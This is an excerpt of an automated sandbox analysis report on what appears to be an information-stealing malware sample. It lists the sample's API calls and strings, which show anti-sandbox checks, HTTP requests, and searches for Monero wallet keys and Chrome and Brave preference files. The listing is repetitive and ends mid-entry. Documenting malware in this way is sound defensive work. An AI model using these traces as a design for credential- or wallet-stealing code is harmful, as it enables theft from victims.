                                • Part of subcall function 00BE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
                                • Part of subcall function 00BE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5228
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 1d53187ed6b3fc7938f25d7a84c9a93290fe863ba0756d177fce9fc41e51f5ba
                              • Instruction ID: 2b41b291826ebd475a051846776977e3d237dfbd8480ce5a8702da72daf2f820
                              • Opcode Fuzzy Hash: 1d53187ed6b3fc7938f25d7a84c9a93290fe863ba0756d177fce9fc41e51f5ba
                              • Instruction Fuzzy Hash: 1E110D7090014CAACB18FB64DD52AFD73B8AF50340F5085A8FA0A5B192EF70AB0EC691

                               Control-flow Graph (legend: Executed / Not Executed)

                               • Node 1493: be1220-be1247, call bf89b0, GlobalMemoryStatusEx
                               • Node 1496: be1249-be1271, call bfda00 (x2)
                               • Node 1497: be1273-be127a
                               • Node 1499: be1281-be1285
                               • Node 1500: be129a-be129d
                               • Node 1501: be1287
                               • Node 1503: be1289-be1290
                               • Node 1504: be1292-be1294, ExitProcess
                               • Edges: 1493->1496, 1493->1497, 1496->1499, 1497->1499, 1499->1500, 1499->1501, 1501->1503, 1501->1504, 1503->1500, 1503->1504
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BE123E
                              • ExitProcess.KERNEL32 ref: 00BE1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 2e179455a7766d41a22f812da629b8083da9a4a85753a65226ddbdf31f7c394f
                              • Instruction ID: 04ae77499852a5e8aa599eac4d6a51822de22c17ef34ee12525b0ae50e35b502
                              • Opcode Fuzzy Hash: 2e179455a7766d41a22f812da629b8083da9a4a85753a65226ddbdf31f7c394f
                              • Instruction Fuzzy Hash: 45014FB094034CABDB10DFD9CC49BADB7B8AB14701F248494E705B6180D7B455458759
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BE112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BE1132
                              • ExitProcess.KERNEL32 ref: 00BE1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 28e6989673a9f04bbcb4631d559bacc011c71a47ea0a507a3e49f91c989cd150
                              • Instruction ID: 4231900304e1c875de07c3a8a651b71811f68debbe54421d9c4b11461fa596fa
                              • Opcode Fuzzy Hash: 28e6989673a9f04bbcb4631d559bacc011c71a47ea0a507a3e49f91c989cd150
                              • Instruction Fuzzy Hash: A5E08670945348FFE7246BA69C0EB0C76B8EB04B01F200094F709B61C0C7B42605969A
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BE10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BE10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: e0b99fa96fb0973335892f9f2f16afb9624291e27c0935fd9c3125fcd17c77ab
                              • Instruction ID: 28d3d31b468d16b065a7cba73cd31946878ac51d00f9d3868f1dbb0dc15d8d25
                              • Opcode Fuzzy Hash: e0b99fa96fb0973335892f9f2f16afb9624291e27c0935fd9c3125fcd17c77ab
                              • Instruction Fuzzy Hash: FEF02771641308BBEB149BA9AC49FBFB7ECE705B15F301898F604E3280D6719F04DAA4
                              APIs
                                • Part of subcall function 00BF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
                                • Part of subcall function 00BF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
                                • Part of subcall function 00BF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F
                                • Part of subcall function 00BF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
                                • Part of subcall function 00BF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
                                • Part of subcall function 00BF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F
                              • ExitProcess.KERNEL32 ref: 00BE11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: fa8b95954369f1ad304ddb780fc0ba377ad4004180618a705e4410e8677077ec
                              • Instruction ID: c8a92416889e5c216db60edfbbff8d17ad00825e4684e9c292f50f0bc8d5665c
                              • Opcode Fuzzy Hash: fa8b95954369f1ad304ddb780fc0ba377ad4004180618a705e4410e8677077ec
                              • Instruction Fuzzy Hash: B2E012B595430957CE1477B7AC0AB3A32DC9B14385F1C08B9FB05E3202FF39E829856A
                              APIs
                              • wsprintfA.USER32 ref: 00BF38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BF38E3
                              • lstrcat.KERNEL32(?,?), ref: 00BF3935
                              • StrCmpCA.SHLWAPI(?,00C00F70), ref: 00BF3947
                              • StrCmpCA.SHLWAPI(?,00C00F74), ref: 00BF395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF3C67
                              • FindClose.KERNEL32(000000FF), ref: 00BF3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: e682b631011b50d17e71b4929ad7c0163e5ba571521f743660660e9b9edafaaf
                              • Instruction ID: d6150970a3b7ab5dce7b40b5cd07fac6dc17f74800472fc30479aed30ac7dbb9
                              • Opcode Fuzzy Hash: e682b631011b50d17e71b4929ad7c0163e5ba571521f743660660e9b9edafaaf
                              • Instruction Fuzzy Hash: 34A11DB19002089FDB34DBA5DC85FFA73B8BB58700F084598A609A7141EB759B89CF62
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00C00B32,00C00B2B,00000000,?,?,?,00C013F4,00C00B2A), ref: 00BEBEF5
                              • StrCmpCA.SHLWAPI(?,00C013F8), ref: 00BEBF4D
                              • StrCmpCA.SHLWAPI(?,00C013FC), ref: 00BEBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEC7BF
                              • FindClose.KERNEL32(000000FF), ref: 00BEC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 6d7be6224877a19a943287e28b584f9f3a2f71c1cbbfaa27577c0300db77f07d
                              • Instruction ID: db036f8f077ea223b893caef287bd354282f7b4a0707f61f910e32d96318cf71
                              • Opcode Fuzzy Hash: 6d7be6224877a19a943287e28b584f9f3a2f71c1cbbfaa27577c0300db77f07d
                              • Instruction Fuzzy Hash: 024226B15101089BCB18FB64DD56EFD73BDAB54300F4085A8BA0AA7191EF74AF4DCB92
                              APIs
                              • wsprintfA.USER32 ref: 00BF492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BF4943
                              • StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
                              • StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
                              • FindClose.KERNEL32(000000FF), ref: 00BF4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: fb92550d771c905c21abebfc81b38557169308f03179fba4f4d86e2f1fdd1702
                              • Instruction ID: 8e1cf5862652a69696db157fae1210ad51c1f0e836d108bf7a794808a6cc7135
                              • Opcode Fuzzy Hash: fb92550d771c905c21abebfc81b38557169308f03179fba4f4d86e2f1fdd1702
                              • Instruction Fuzzy Hash: BA6112B1500219AFCB34EBA1DC49FFA73BCBB58701F0485D8E609A6141EB75AB49CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BF4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF4587
                              • wsprintfA.USER32 ref: 00BF45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BF45BD
                              • StrCmpCA.SHLWAPI(?,00C00FC4), ref: 00BF45EB
                              • StrCmpCA.SHLWAPI(?,00C00FC8), ref: 00BF4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF468B
                              • FindClose.KERNEL32(000000FF), ref: 00BF46A0
                              • lstrcat.KERNEL32(?,009BF3B0), ref: 00BF46C5
                              • lstrcat.KERNEL32(?,009BDEE0), ref: 00BF46D8
                              • lstrlen.KERNEL32(?), ref: 00BF46E5
                              • lstrlen.KERNEL32(?), ref: 00BF46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 8ddd8c5263fab52879a1f003d407a5702c8bbe7189921d94de3d399d42ae6cec
                              • Instruction ID: ab245f80ba52ff99a044c42b892c78cb8a9c08068c93c5b023b52a85ffbdf729
                              • Opcode Fuzzy Hash: 8ddd8c5263fab52879a1f003d407a5702c8bbe7189921d94de3d399d42ae6cec
                              • Instruction Fuzzy Hash: B95133B154021CAFCB24EB75DC89FFE73BCAB58300F4445D9B609A6190EB749B898F91
                              APIs
                              • wsprintfA.USER32 ref: 00BF3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BF3EDA
                              • StrCmpCA.SHLWAPI(?,00C00FAC), ref: 00BF3F08
                              • StrCmpCA.SHLWAPI(?,00C00FB0), ref: 00BF3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF406C
                              • FindClose.KERNEL32(000000FF), ref: 00BF4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 7131ee06f47c1c711c59f7132863f5dbc7106475b4d855e85c8c87e623a4da5b
                              • Instruction ID: e85c7c94c0166bccfb207efa50c1e735ce759ad2fe3fdba2f0f7232c91af0b78
                              • Opcode Fuzzy Hash: 7131ee06f47c1c711c59f7132863f5dbc7106475b4d855e85c8c87e623a4da5b
                              • Instruction Fuzzy Hash: 245134B5900218ABCB28EBB5DC85EFA73BCBB54700F0445D8B759A6040DB75DB8E8F91
                              APIs
                              • wsprintfA.USER32 ref: 00BEED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BEED55
                              • StrCmpCA.SHLWAPI(?,00C01538), ref: 00BEEDAB
                              • StrCmpCA.SHLWAPI(?,00C0153C), ref: 00BEEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEF2AE
                              • FindClose.KERNEL32(000000FF), ref: 00BEF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 5339623d88b7342b666b9502f3e30726f7f2b70d34e851c4286c35886b63ceb7
                              • Instruction ID: cd447338496f49b33e0c461638b68dac4b36a2a869a94210b223366c281aa7a7
                              • Opcode Fuzzy Hash: 5339623d88b7342b666b9502f3e30726f7f2b70d34e851c4286c35886b63ceb7
                              • Instruction Fuzzy Hash: 24E1CFB191111C9ADB58EB64CC51EFEB3B8AF54340F4041E9B60A63092EF706B8ECF51
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
